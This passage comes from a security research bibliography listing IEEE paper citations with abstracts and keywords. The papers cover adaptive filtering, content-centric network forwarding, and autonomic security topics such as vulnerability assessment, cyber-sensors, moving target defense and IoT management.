    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6685832&isnumber=6689334
  • Tsilopoulos, C.; Xylomenos, G.; Thomas, Y., "Reducing forwarding state in content-centric networks with semi-stateless forwarding," INFOCOM, 2014 Proceedings IEEE , vol., no., pp.2067,2075, April 27 2014-May 2 2014. Routers in the Content-Centric Networking (CCN) architecture maintain state for all pending content requests, so as to be able to later return the corresponding content. By employing stateful forwarding, CCN supports native multicast, enhances security and enables adaptive forwarding, at the cost of excessive forwarding state that raises scalability concerns. We propose a semi-stateless forwarding scheme in which, instead of tracking each request at every on-path router, requests are tracked at every d hops. At intermediate hops, requests gather reverse path information, which is later used to deliver responses between routers using Bloom filter-based stateless forwarding. Our approach effectively reduces forwarding state, while preserving the advantages of CCN forwarding. Evaluation results over realistic ISP topologies show that our approach reduces forwarding state by 54%-70% in unicast delivery, without any bandwidth penalties, while in multicast delivery it reduces forwarding state by 34%-55% at the expense of 6%-13% in bandwidth overhead.
    Keywords: computer networks; data structures ;topology; Bloom filter-based stateless forwarding; CCN architecture; ISP topologies; adaptive forwarding; content-centric networking architecture; semi-stateless forwarding scheme; unicast delivery;Bandwidth; Computer architecture ;Computers; Conferences; Ports (Computers); Probabilistic logic; Unicast (ID#:14-2029)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6848148&isnumber=6847911
  • Boruah, A; Hazarika, S.M., "An MEBN framework as a dynamic firewall's knowledge flow architecture," Signal Processing and Integrated Networks (SPIN), 2014 International Conference on , vol., no., pp.249,254, 20-21 Feb. 2014. Dynamic firewalls with stateful inspection have added a lot of security features over the stateless traditional static filters. Dynamic firewalls need to be adaptive. In this paper, we have designed a framework for dynamic firewalls based on probabilistic ontology using Multi Entity Bayesian Networks (MEBN) logic. MEBN extends ordinary Bayesian networks to allow representation of graphical models with repeated substructures and can express a probability distribution over models of any consistent first order theory. The motivation of our proposed work is about preventing novel attacks (i.e. those attacks for which no signatures have been generated yet). The proposed framework is in two important parts: first part is the data flow architecture which extracts important connection based features with the prime goal of an explicit rule inclusion into the rule base of the firewall; second part is the knowledge flow architecture which uses semantic threat graph as well as reasoning under uncertainty to fulfill the required objective of providing futuristic threat prevention technique in dynamic firewalls.
    Keywords: belief networks; data flow computing; firewalls; ontologies (artificial intelligence); statistical distributions; MEBN framework; MEBN logic; data flow architecture; dynamic firewalls; first order theory; futuristic threat prevention technique; graphical models; knowledge flow architecture; multi entity Bayesian networks; probabilistic ontology; probability distribution; security features; stateful inspection; stateless traditional static filters; Bayes methods ;Feature extraction; Ontologies; Probabilistic logic; Semantics; Signal processing algorithms; Bayesian networks; MEBN; Probabilistic Ontology; explicit rule inclusion; semantic threat graph (ID#:14-2030)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6776957&isnumber=6776904
  • Jian Wang; Lin Mei; Yi Li; Jian-Ye Li; Kun Zhao; Yuan Yao, "Variable Window for Outlier Detection and Impulsive Noise Recognition in Range Images," Cluster, Cloud and Grid Computing (CCGrid), 2014 14th IEEE/ACM International Symposium on , vol., no., pp.857,864, 26-29 May 2014. To improve comprehensive performance of denoising range images, an impulsive noise (IN) denoising method with variable windows is proposed in this paper. Founded on several discriminant criteria, the principles of dropout IN detection and outlier IN detection are provided. Subsequently, a nearest non-IN neighbors searching process and an Index Distance Weighted Mean filter is combined for IN denoising. As key factors of adapatablity of the proposed denoising method, the sizes of two windows for outlier INs detection and INs denoising are investigated. Originated from a theoretical model of invader occlusion, variable window is presented for adapting window size to dynamic environment of each point, accompanying with practical criteria of adaptive variable window size determination. Experiments on real range images of multi-line surface are proceeded with evaluations in terms of computational complexity and quality assessment with comparison analysis among a few other popular methods. It is indicated that the proposed method can detect the impulsive noises with high accuracy, meanwhile, denoise them with strong adaptability with the help of variable window.
    Keywords: computational complexity ;image denoising ;image recognition; impulse noise; adaptive variable window size determination; computational complexity; discriminant criteria; dropout IN detection; dynamic environment; impulsive noise denoising; impulsive noise recognition; index distance weighted mean filter; invader occlusion; multiline surface; nearest nonIN neighbors searching process; outlier IN detection; quality assessment; range image denoising; Algorithm design and analysis; Educational institutions; Image denoising; Indexes; Noise; Noise reduction; Wavelet transforms; Impulsive noise recognition; Index Distance Weighted Mean filter; Outlier detection; Range image denoising; Variable window (ID#:14-2031)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6846539&isnumber=6846423
  • Weikun Hou; Xianbin Wang; Chouinard, J.-Y.; Refaey, A, "Physical Layer Authentication for Mobile Systems with Time-Varying Carrier Frequency Offsets," Communications, IEEE Transactions on , vol.62, no.5, pp.1658,1667, May 2014. A novel physical layer authentication scheme is proposed in this paper by exploiting the time-varying carrier frequency offset (CFO) associated with each pair of wireless communications devices. In realistic scenarios, radio frequency oscillators in each transmitter-and-receiver pair always present device-dependent biases to the nominal oscillating frequency. The combination of these biases and mobility-induced Doppler shift, characterized as a time-varying CFO, can be used as a radiometric signature for wireless device authentication. In the proposed authentication scheme, the variable CFO values at different communication times are first estimated. Kalman filtering is then employed to predict the current value by tracking the past CFO variation, which is modeled as an autoregressive random process. To achieve the proposed authentication, the current CFO estimate is compared with the Kalman predicted CFO using hypothesis testing to determine whether the signal has followed a consistent CFO pattern. An adaptive CFO variation threshold is derived for device discrimination according to the signal-to-noise ratio and the Kalman prediction error. In addition, a software-defined radio (SDR) based prototype platform has been developed to validate the feasibility of using CFO for authentication. Simulation results further confirm the effectiveness of the proposed scheme in multipath fading channels.
    Keywords: Doppler shift; Kalman filters; fading channels; multipath channels; radio networks; radio receivers; radio transmitters; software radio; telecommunication security; CFO; Doppler shift; Kalman filtering; Kalman prediction error; SDR; mobile systems; multipath fading channels; nominal oscillating frequency; physical layer authentication; prototype platform; radio frequency oscillators; radiometric signature; receiver; signal-to-noise ratio; software defined radio; time varying carrier frequency offsets; transmitter; wireless communications devices; wireless device authentication; Authentication; Doppler shift; Estimation; Kalman filters; Physical layer; Signal to noise ratio; Wireless communication; Kalman filtering; Physical layer authentication; carrier frequency offset (CFO);hypothesis testing (ID#:14-2032)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6804410&isnumber=6816514
  • Huang, T.; Drake, B.; Aalfs, D.; Vidakovic, B., "Nonlinear Adaptive Filtering with Dimension Reduction in the Wavelet Domain," Data Compression Conference (DCC), 2014 , vol., no., pp.408,408, 26-28 March 2014. Recent advances in adaptive filter theory and the hardware for signal acquisition have led to the realization that purely linear algorithms are often not adequate in these domains. Nonlinearities in the input space have become apparent with today's real world problems. Algorithms that process the data must keep pace with the advances in signal acquisition. Recently kernel adaptive (online) filtering algorithms have been proposed that make no assumptions regarding the linearity of the input space. Additionally, advances in wavelet data compression/dimension reduction have also led to new algorithms that are appropriate for producing a hybrid nonlinear filtering framework. In this paper we utilize a combination of wavelet dimension reduction and kernel adaptive filtering. We derive algorithms in which the dimension of the data is reduced by a wavelet transform. We follow this by kernel adaptive filtering algorithms on the reduced-domain data to find the appropriate model parameters demonstrating improved minimization of the mean-squared error (MSE). Another important feature of our methods is that the wavelet filter is also chosen based on the data, on-the-fly. In particular, it is shown that by using a few optimal wavelet coefficients from the constructed wavelet filter for both training and testing data sets as the input to the kernel adaptive filter, convergence to the near optimal learning curve (MSE) results. We demonstrate these algorithms on simulated and a real data set from food processing.
    Keywords: adaptive filters; mean square error methods; wavelet transforms; MSE minimization; kernel adaptive filtering; mean-squared error minimization; nonlinear adaptive filtering; wavelet coefficients; wavelet dimension reduction; wavelet domain; wavelet transform; Adaptive filters; Algorithm design and analysis; Kernel; Training; Wavelet domain; Wavelet transforms; Pollen wavelets; dimension reduction; kernel adaptive filtering; wavelet transform (ID#:14-2033)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6824460&isnumber=6824399
  • Nikolic, G.; Nikolic, T.; Petrovic, B., "Using Adaptive Filtering In Single-Phase Grid-Connected System," Microelectronics Proceedings - MIEL 2014, 2014 29th International Conference on , vol., no., pp.417,420, 12-14 May 2014. Recently, there has been a pronounced increase of interest in the field of renewable energy. In this area power inverters are crucial building blocks in a segment of energy converters, since they change direct current (DC) to alternating current (AC). Grid connected power inverters should operate in synchronism with the grid voltage. In this paper, the structure of a power system based on adaptive filtering is described. The main purpose of the adaptive filter is to adapt the output signal of the inverter to the corresponding load and/or grid signal. By involving adaptive filtering the response time decreases and quality of power delivery to the load or grid increases. A comparative analysis which relates to power system operation without and with adaptive filtering is given. In addition, the impact of variable impedance of load on quality of delivered power is considered. Results which relates to total harmonic distortion (THD) factor are obtained by Matlab/Simulink software.
    Keywords: adaptive filters; harmonic distortion; invertors; adaptive filtering; alternating current; direct current; energy converters; ower delivery; power inverters; renewable energy;response time; single phase grid connected system; total harmonic distortion factor; variable impedance; Adaptive filters; Adaptive systems; Inverters; Least squares approximations; Power harmonic filters; Pulse width modulation (ID#:14-2034)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6842179&isnumber=6842067
  • Zhen Jiang; Shihong Miao; Pei Liu, "A Modified Empirical Mode Decomposition Filtering-Based Adaptive Phasor Estimation Algorithm for Removal of Exponentially Decaying DC Offset," Power Delivery, IEEE Transactions on , vol.29, no.3, pp.1326,1334, June 2014. This paper proposes a modified empirical-mode decomposition (EMD) filtering-based adaptive dynamic phasor estimation algorithm for the removal of exponentially decaying dc offset. Discrete Fourier transform does not have the ability to attain the accurate phasor of the fundamental frequency component in digital protective relays under dynamic system fault conditions because the characteristic of exponentially decaying dc offset is not consistent. EMD is a fully data-driven, not model-based, adaptive filtering procedure for extracting signal components. But the original EMD technique has high computational complexity and requires a large data series. In this paper, a short data series-based EMD filtering procedure is proposed and an optimum hermite polynomial fitting (OHPF) method is used in this modified procedure. The proposed filtering technique has high accuracy and convergent speed, and is greatly appropriate for relay applications. This paper illustrates the characteristics of the proposed technique and evaluates its performance by computer-simulated signals, PSCAD/EMTDC-generated signals, and real power system fault signals.
    Keywords: adaptive filters; discrete Fourier transforms; phasor measurement; polynomial approximation; power harmonic filters; power system faults; relays; adaptive dynamic phasor estimation algorithm; adaptive filtering procedure; digital protective relays; discrete Fourier transform; dynamic system fault; exponentially decaying DC offset; fundamental frequency component; modified empirical mode decomposition filtering; optimum hermite polynomial fitting method; real power system fault signals; Algorithm design and analysis; Discrete Fourier transforms; Estimation; Heuristic algorithms; Polynomials; Power system dynamics; Relays; Adaptive filtering; empirical mode decomposition; exponentially decaying dc offset; optimum hermite polynomial fitting; phasor estimation (ID#:14-2035)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6730717&isnumber=6819482
  • Bhotto, M.Z.A; Antoniou, A, "Affine-Projection-Like Adaptive-Filtering Algorithms Using Gradient-Based Step Size," Circuits and Systems I: Regular Papers, IEEE Transactions on , vol.61, no.7, pp.2048,2056, July 2014. A new class of affine-projection-like (APL) adaptive-filtering algorithms is proposed. The new algorithms are obtained by eliminating the constraint of forcing the a posteriori error vector to zero in the affine-projection algorithm proposed by Ozeki and Umeda. In this way, direct or indirect inversion of the input signal matrix is not required and, consequently, the amount of computation required per iteration can be reduced. In addition, as demonstrated by extensive simulation results, the proposed algorithms offer reduced steady-state misalignment in system-identification, channel-equalization, and acoustic-echo-cancelation applications. A mean-square-error analysis of the proposed APL algorithms is also carried out and its accuracy is verified by using simulation results in a system-identification application.
    Keywords: adaptive filters; gradient methods; mean square error methods; a posteriori error vector; acoustic-echo-cancelation applications; affine-projection-like adaptive-filtering algorithms; channel-equalization; gradient-based step size; input signal matrix; mean-square-error analysis; steady-state misalignment; system-identification; Algorithm design and analysis; Computational complexity; Convergence; Least squares approximations; Matrix decomposition; Steady-state; Vectors; Adaptive filters; adaptive-filtering algorithms; affine-projection algorithms; mean-square error in adaptive filtering (ID#:14-2036)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6747407&isnumber=6842725
  • Bin Sun; Shutao Li; Jun Sun, "Scanned Image Descreening With Image Redundancy and Adaptive Filtering," Image Processing, IEEE Transactions on , vol.23, no.8, pp.3698,3710, Aug. 2014. Currently, most electrophotographic printers use halftoning technique to print continuous tone images, so scanned images obtained from such hard copies are usually corrupted by screen like artifacts. In this paper, a new model of scanned halftone image is proposed to consider both printing distortions and halftone patterns. Based on this model, an adaptive filtering based descreening method is proposed to recover high quality contone images from the scanned images. Image redundancy based denoising algorithm is first adopted to reduce printing noise and attenuate distortions. Then, screen frequency of the scanned image and local gradient features are used for adaptive filtering. Basic contone estimate is obtained by filtering the denoised scanned image with an anisotropic Gaussian kernel, whose parameters are automatically adjusted with the screen frequency and local gradient information. Finally, an edge-preserving filter is used to further enhance the sharpness of edges to recover a high quality contone image. Experiments on real scanned images demonstrate that the proposed method can recover high quality contone images from the scanned images. Compared with the state-of-the-art methods, the proposed method produces very sharp edges and much cleaner smooth regions.
    Keywords: Gaussian processes; adaptive filters; electrophotography; image denoising; printers; adaptive filtering; anisotropic Gaussian kernel; continuous tone image print; denoising algorithm; edge-preserving filter; electrophotographic printers; halftone pattern; high quality contone image recovery ;image redundancy ;local gradient features; printing distortion; printing noise reduction; scanned halftone image; scanned image descreening; Image edge detection; Kernel; Noise; Noise reduction; Printers; Printing; Redundancy; Scanned image; adaptive filtering; descreening; inverse halftoning; steerable filter (ID#:14-2037)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6841640&isnumber=6840896
  • Arablouei, R.; Werner, S.; Dogancay, K., "Analysis of the Gradient-Descent Total Least-Squares Adaptive Filtering Algorithm," Signal Processing, IEEE Transactions on , vol.62, no.5, pp.1256,1264, March1, 2014. The gradient-descent total least-squares (GD-TLS) algorithm is a stochastic-gradient adaptive filtering algorithm that compensates for error in both input and output data. We study the local convergence of the GD-TLS algorithm and find bounds for its step-size that ensure its stability. We also analyze the steady-state performance of the GD-TLS algorithm and calculate its steady-state mean-square deviation. Our steady-state analysis is inspired by the energy-conservation-based approach to the performance analysis of adaptive filters. The results predicted by the analysis show good agreement with the simulation experiments.
    Keywords: adaptive filters; least squares approximations; stochastic processes; energy-conservation; gradient-descent total least-squares algorithm; steady-state analysis; steady-state mean-square deviation; stochastic-gradient adaptive filtering algorithm; Adaptive filters; Algorithm design and analysis; Signal processing algorithms; Stability criteria; Steady-state; Vectors; Adaptive filtering; Rayleigh quotient; mean-square deviation; performance analysis; stability; total least-squares (ID#:14-2038)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6716043&isnumber=6732988
  • Thu Trang Le; Atto, AM.; Trouve, E.; Nicolas, J.-M., "Adaptive Multitemporal SAR Image Filtering Based on the Change Detection Matrix," Geoscience and Remote Sensing Letters, IEEE , vol.11, no.10, pp.1826,1830, Oct. 2014. This letter presents an adaptive filtering approach of synthetic aperture radar (SAR) image times series based on the analysis of the temporal evolution. First, change detection matrices (CDMs) containing information on changed and unchanged pixels are constructed for each spatial position over the time series by implementing coefficient of variation (CV) cross tests. Afterward, the CDM provides for each pixel in each image an adaptive spatiotemporal neighborhood, which is used to derive the filtered value. The proposed approach is illustrated on a time series of 25 ascending TerraSAR-X images acquired from November 6, 2009 to September 25, 2011 over the Chamonix-Mont-Blanc test-site, which includes different kinds of change, such as parking occupation, glacier surface evolution, etc.
    Keywords: adaptive filters; matrix algebra; radar detection; radar imaging;s ynthetic aperture radar; time series; CDM; CV; Chamonix-Mont-Blanc test-site; TerraSAR-X image acquisition; adaptive multitemporal SAR image filtering approach; adaptive spatiotemporal neighborhood; change detection matrix; coefficient of variation; glacier surface evolution; parking occupation; synthetic aperture radar ;temporal evolution analysis ;time series; Filtering;Indexes; Noise; Remote sensing; Speckle; Synthetic aperture radar; Time series analysis; Change detection; coefficient of variation (CV);synthetic aperture radar (SAR) image time series; temporal adaptive filtering (ID#:14-2039)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6784380&isnumber=6814328
  • Zerguine, A; Hammi, O.; Abdelhafiz, AH.; Helaoui, M.; Ghannouchi, F., "Behavioral modeling and predistortion of nonlinear power amplifiers based on adaptive filtering techniques," Multi-Conference on Systems, Signals & Devices (SSD), 2014 11th International , vol., no., pp.1,5, 11-14 Feb. 2014. In this paper, the use of some of the most popular adaptive filtering algorithms for the purpose of linearizing power amplifiers by the well-known digital predistortion (DPD) technique is investigated. First, an introduction to the problem of power amplifier linearization is given, followed by a discussion of the model used for this purpose. Next, a variety of adaptive algorithms are used to construct the digital predistorter function for a highly nonlinear power amplifier and their performance is comparatively analyzed. Based on the simulations presented in this paper, conclusions regarding the choice of algorithm are derived.
    Keywords: adaptive filters; power amplifiers; DPD technique; adaptive filtering techniques; behavioral modeling; digital predistortion technique; nonlinear power amplifier predistortion; power amplifier linearization; Adaptation models; Wireless communication; Adaptive filtering; behavioral modeling; nonlinear system identification; power amplifier nonlinearities (ID#:14-2040)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6808909&isnumber=6808745
  • Wei Zhu; Jun Tang; Shuang Wan; Jie-Li Zhu, "Outlier-resistant adaptive filtering based on sparse Bayesian learning," Electronics Letters , vol.50, no.9, pp.663,665, April 24 2014. In adaptive processing applications, the design of the adaptive filter requires estimation of the unknown interference-plus-noise covariance matrix from secondary training data. The presence of outliers in the training data can severely degrade the performance of adaptive processing. By exploiting the sparse prior of the outliers, a Bayesian framework to develop a computationally efficient outlier-resistant adaptive filter based on sparse Bayesian learning (SBL) is proposed. The expectation-maximisation (EM) algorithm is used therein to obtain a maximum a posteriori (MAP) estimate of the interference-plus-noise covariance matrix. Numerical simulations demonstrate the superiority of the proposed method over existing methods.
    Keywords: Bayes methods; adaptive filters; covariance matrices; expectation-maximization algorithm; filtering theory; interference (signal);learning (artificial intelligence);EM algorithm; MAP estimation; SBL; adaptive processing applications; expectation-maximisation algorithm; maximum a posteriori estimation; outlier-resistant adaptive filtering; secondary training data; sparse Bayesian learning; unknown interference-plus-noise covariance matrix estimation (ID#:14-2041)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6809283&isnumber=6809270
  • Shi, L.; Lin, Y., "Convex Combination of Adaptive Filters under the Maximum Correntropy Criterion in Impulsive Interference," Signal Processing Letters, IEEE , vol.21, no.11, pp.1385,1388, Nov. 2014. A robust adaptive filtering algorithm based on the convex combination of two adaptive filters under the maximum correntropy criterion (MCC) is proposed. Compared with conventional minimum mean square error (MSE) criterion-based adaptive filtering algorithm, the MCC-based algorithm shows a better robustness against impulsive interference. However, its major drawback is the conflicting requirements between convergence speed and steady-state mean square error. In this letter, we use the convex combination method to overcome the tradeoff problem. Instead of minimizing the squared error to update the mixing parameter in conventional convex combination scheme, the method of maximizing the correntropy is introduced to make the proposed algorithm more robust against impulsive interference. Additionally, we report a novel weight transfer method to further improve the tracking performance. The good performance in terms of convergence rate and steady-state mean square error is demonstrated in plant identification scenarios that include impulsive interference and abrupt changes.
    Keywords: adaptive filtering; convex combination ;impulsive interference; maximum correntropy criterion; weight transfer (ID#:14-2042)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6857382&isnumber=6848869
  • Tong Liu; Xu, Qian; Li, Yuejun, "Adaptive filtering design for in-motion alignment of INS," Control and Decision Conference (2014 CCDC), The 26th Chinese on , vol., no., pp.2669,2674, May 31 2014-June 2 2014. Misalignment angles estimation of strapdown inertial navigation system (INS) using global positioning system (GPS) data is highly affected by measurement noises, especially with noises displaying time varying statistical properties. Hence, adaptive filtering approach is recommended for the purpose of improving the accuracy of in-motion alignment. In this paper, a simplified form of Celso's adaptive stochastic filtering is derived and applied to estimate both the INS error states and measurement noise statistics. To detect and bound the influence of outliers in INS/GPS integration, outlier detection based on jerk tracking model is also proposed. The accuracy and validity of the proposed algorithm is tested through ground based navigation experiments.
    Keywords: Global Positioning System Kalman filters; Mathematical model; Noise; Noise measurement; Vehicles; INS/GPS integration; adaptive filtering ;in-motion alignment; outlier detection (ID#:14-2043)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6852624&isnumber=6852105
  • Tuia, D.; Munoz-Mari, J.; Rojo-Alvarez, J.L.; Martinez-Ramon, M.; Camps-Valls, G., "Explicit Recursive and Adaptive Filtering in Reproducing Kernel Hilbert Spaces," Neural Networks and Learning Systems, IEEE Transactions on , vol.25, no.7, pp.1413,1419, July 2014. This brief presents a methodology to develop recursive filters in reproducing kernel Hilbert spaces. Unlike previous approaches that exploit the kernel trick on filtered and then mapped samples, we explicitly define the model recursivity in the Hilbert space. For that, we exploit some properties of functional analysis and recursive computation of dot products without the need of preimaging or a training dataset. We illustrate the feasibility of the methodology in the particular case of the g-filter, which is an infinite impulse response filter with controlled stability and memory depth. Different algorithmic formulations emerge from the signal model. Experiments in chaotic and electroencephalographic time series prediction, complex nonlinear system identification, and adaptive antenna array processing demonstrate the potential of the approach for scenarios where recursivity and nonlinearity have to be readily combined.
    Keywords: Hilbert spaces; IIR filters; adaptive filters; recursive filters; stability; time series; adaptive antenna array processing; adaptive filtering; chaotic time series prediction; complex nonlinear system identification; controlled stability; electroencephalographic time series prediction; functional analysis; infinite impulse response filter; kernel Hilbert spaces; memory depth; recursive filtering; adaptation models; Hilbert space; Kernel; Mathematical model; Time series analysis; Training; Vectors; Adaptive; autoregressive and moving-average; filter; kernel methods; recursive; (ID#:14-2044)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6722955&isnumber=6828828
  • Shimauchi, Suehiro; Ohmuro, Hitoshi, "Accurate adaptive filtering in square-root Hann windowed short-time fourier transform domain," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.1305,1309, 4-9 May 2014. A novel short-time Fourier transform (STFT) domain adaptive filtering scheme is proposed that can be easily combined with nonlinear post filters such as residual echo or noise reduction in acoustic echo cancellation. Unlike normal STFT subband adaptive filters, which suffers from aliasing artifacts due to its poor prototype filter, our scheme achieves good accuracy by exploiting the relationship between the linear convolution and the poor prototype filter, i.e., the STFT window function. The effectiveness of our scheme was confirmed through the results of simulations conducted to compare it with conventional methods.
    Keywords: Adaptive filters ;acoustic echo cancellation; short-time Fourier transform; square-root Hann window (ID#:14-2045)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6853808&isnumber=6853544

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Autonomic Security

Autonomic Security


Autonomic computing refers to the self-management of complex distributed computing resources, that can adapt to unpredictable changes with transparency to operators and users. Security is one of the four key elements of autonomic computing and includes proactive identification and protection from arbitrary attacks. The articles cited here describe research into the security problems associated with a variety of autonomic systems and were published in the first half of 2014. Topics include autonomic security regarding vulnerability assessments, intelligent sensors, encryption, services, and the Internet of Things.

  • Barrere, M.; Badonnel, R.; Festor, O., "Vulnerability Assessment in Autonomic Networks and Services: A Survey," Communications Surveys & Tutorials, IEEE , vol.16, no.2, pp.988,1004, Second Quarter 2014. Autonomic networks and services are exposed to a large variety of security risks. The vulnerability management process plays a crucial role for ensuring their safe configurations and preventing security attacks. We focus in this survey on the assessment of vulnerabilities in autonomic environments. In particular, we analyze current methods and techniques contributing to the discovery, the description and the detection of these vulnerabilities. We also point out important challenges that should be faced in order to fully integrate this process into the autonomic management plane.
    Keywords: computer network security; fault tolerant computing; autonomic management plane; autonomic networks; autonomic services; security attacks; security risks; vulnerability assessment; vulnerability management process; Autonomic systems; Business; Complexity theory; Computers; Monitoring; Security; Vulnerability assessment; autonomic computing; computer security; vulnerability management (ID#:14-2046)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6587997&isnumber=6811383
  • Vollmer, T.; Manic, M.; Linda, O., "Autonomic Intelligent Cyber-Sensor to Support Industrial Control Network Awareness," Industrial Informatics, IEEE Transactions on , vol.10, no.2, pp.1647,1658, May 2014. The proliferation of digital devices in a networked industrial ecosystem, along with an exponential growth in complexity and scope, has resulted in elevated security concerns and management complexity issues. This paper describes a novel architecture utilizing concepts of autonomic computing and a simple object access protocol (SOAP)-based interface to metadata access points (IF-MAP) external communication layer to create a network security sensor. This approach simplifies integration of legacy software and supports a secure, scalable, and self-managed framework. The contribution of this paper is twofold: 1) A flexible two-level communication layer based on autonomic computing and service oriented architecture is detailed and 2) three complementary modules that dynamically reconfigure in response to a changing environment are presented. One module utilizes clustering and fuzzy logic to monitor traffic for abnormal behavior. Another module passively monitors network traffic and deploys deceptive virtual network hosts. These components of the sensor system were implemented in C++ and PERL and utilize a common internal D-Bus communication mechanism. A proof of concept prototype was deployed on a mixed-use test network showing the possible real-world applicability. In testing, 45 of the 46 network attached devices were recognized and 10 of the 12 emulated devices were created with specific operating system and port configurations. In addition, the anomaly detection algorithm achieved a 99.9% recognition rate. All output from the modules were correctly distributed using the common communication structure.
    Keywords: access protocols; computer network security ;fault tolerant computing; field buses; fuzzy logic; industrial control; intelligent sensors; meta data; network interfaces; pattern clustering; C++;IF-MAP; PERL; SOAP-based interface; anomaly detection algorithm; autonomic computing; autonomic intelligent cyber-sensor; digital device proliferation; flexible two-level communication layer; fuzzy logic; industrial control network awareness; internal D-Bus communication mechanism; legacy software; metadata access point external communication layer; mixed-use test network; network security sensor; networked industrial ecosystem; proof of concept prototype; self-managed framework; service oriented architecture; simple object access protocol-based interface; traffic monitor; virtual network hosts; Autonomic computing; control systems; industrial ecosystems; network security; service-oriented architecture (ID#:14-2047)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6547755&isnumber=6809862
  • Azab, M., "Multidimensional Diversity Employment for Software Behavior Encryption," New Technologies, Mobility and Security (NTMS), 2014 6th International Conference on, vol., no., pp.1,5, March 30 2014-April 2, 2014. Modern cyber systems and their integration with the infrastructure has a clear effect on the productivity and quality of life immensely. Their involvement in our daily life elevate the need for means to insure their resilience against attacks and failure. One major threat is the software monoculture. Latest research work demonstrated the danger of software monoculture and presented diversity to reduce the attack surface. In this paper, we propose ChameleonSoft, a multidimensional software diversity employment to, in effect, induce spatiotemporal software behavior encryption and a moving target defense. ChameleonSoft introduces a loosely coupled, online programmable software-execution foundation separating logic, state and physical resources. The elastic construction of the foundation enabled ChameleonSoft to define running software as a set of behaviorally-mutated functionally-equivalent code variants. ChameleonSoft intelligently Shuffle, at runtime, these variants while changing their physical location inducing untraceable confusion and diffusion enough to encrypt the execution behavior of the running software. ChameleonSoft is also equipped with an autonomic failure recovery mechanism for enhanced resilience. In order to test the applicability of the proposed approach, we present a prototype of the ChameleonSoft Behavior Encryption (CBE) and recovery mechanisms. Further, using analysis and simulation, we study the performance and security aspects of the proposed system. This study aims to assess the provisioned level of security by measuring the avalanche effect percentage and the induced confusion and diffusion levels to evaluate the strength of the CBE mechanism. Further, we compute the computational cost of security provisioning and enhancing system resilience.
    Keywords: computational complexity; cryptography; multidimensional systems; software fault tolerance ;system recovery; CBE mechanism; ChameleonSoft Behavior Encryption; ChameleonSoft recovery mechanisms ;autonomic failure recovery mechanism; avalanche effect percentage; behaviorally-mutated functionally-equivalent code variants; computational cost; confusion levels; diffusion levels; moving target defense; multidimensional software diversity employment; online programmable software-execution foundation separating logic; security level; security provisioning; software monoculture; spatiotemporal software behavior encryption; system resilience; Employment; Encryption; Resilience; Runtime; Software; Spatiotemporal phenomena (ID#:14-2048)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814033&isnumber=6813963
  • Schaefer, J., "A Semantic Self-Management Approach For Service Platforms," Network Operations and Management Symposium (NOMS), 2014 IEEE, vol., no., pp.1,4, 5-9 May 2014. Future personal living environments feature an increasing number of convenience-, health- and security-related applications provided by distributed services, which do not only support users but require tasks such as installation, configuration and continuous administration. These tasks are becoming tiresome, complex and error-prone. One way to escape this situation is to enable service platforms to configure and manage themselves. The approach presented here extends services with semantic descriptions to enable platform-independent autonomous service level management using model driven architecture and autonomic computing concepts. It has been implemented as a OSGi-based semantic autonomic manager, whose concept, prototypical implementation and evaluation are presented.
    Keywords: distributed processing; fault tolerant computing ;service-oriented architecture; OSGi-based semantic autonomic manager; autonomic computing concepts; configuration task; continuous administration task; convenience-related applications; distributed services; health-related applications; installation task; model driven architecture; platform-independent autonomous service level management; security-related applications; semantic descriptions; semantic self-management approach; service platforms; Computational modeling; Grounding; Knowledge based systems; Monitoring; Ontologies; Quality of service; Semantics; Autonomic Computing; Model Driven Architecture; Ontologies; Semantic Services; Service Level Management (ID#:14-2049)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838329&isnumber=6838210
  • Leong, P.; Liming Lu, "Multiagent Web for the Internet of Things," Information Science and Applications (ICISA), 2014 International Conference on, vol., no., pp.1,4, 6-9 May 2014. The Internet of Things (IOT) is a network of networks where massively large numbers of objects or things are interconnected to each other through the network. The Internet of Things brings along many new possibilities of applications to improve human comfort and quality of life. Complex systems such as the Internet of Things are difficult to manage because of the emergent behaviours that arise from the complex interactions between its constituent parts. Our key contribution in the paper is a proposed multiagent web for the Internet of Things. Corresponding data management architecture is also proposed. The multiagent architecture provides autonomic characteristics for IOT making the IOT manageable. In addition, the multiagent web allows for flexible processing on heterogeneous platforms as we leverage off web protocols such as HTTP and language independent data formats such as JSON for communications between agents. The architecture we proposed enables a scalable architecture and infrastructure for a web-scale multiagent Internet of Things.
